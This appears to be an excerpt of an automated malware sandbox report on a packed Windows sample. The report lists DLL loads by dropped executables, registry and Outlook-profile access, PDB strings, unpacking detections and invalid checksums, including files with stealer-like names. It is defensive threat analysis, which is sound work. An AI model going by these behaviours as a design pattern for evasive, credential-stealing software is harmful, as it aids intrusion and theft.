Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: riched20.dll

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: WlCIinu0yp.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: WlCIinu0yp.exe

Static file information: File size 5740032 > 1048576

Source: WlCIinu0yp.exe

Static PE information: Raw size of .themida is bigger than: 0x100000 < 0x4b0000

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Unpacked PE file: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Unpacked PE file: 12.2.ZzpT5hwyVjlAXfLjB1r1iwOX.exe.900000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Unpacked PE file: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Unpacked PE file: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.libcc1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack

Binary contains a suspicious time stamp

Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr

Static PE information: 0xC2FA201D [Mon Aug 28 18:55:25 2073 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress,

7_2_00418BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .themida

PE file contains an invalid checksum

Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x5b5a0
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: 0kNDw1qtthM70owdcV01L1ro.exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: 7725eaa6592c80f8124e769b4e8a07f7[1].exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: MSIUpdaterV202.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: lumma2804[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: setup[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1458c
Source: 6JeTTVCBi2pYO9g7t24p.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: AdobeUpdaterV202.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: aeb24096[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xb3e71
Source: lmmycYk2THJ6kqlicmdyWtVT.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xb3e71
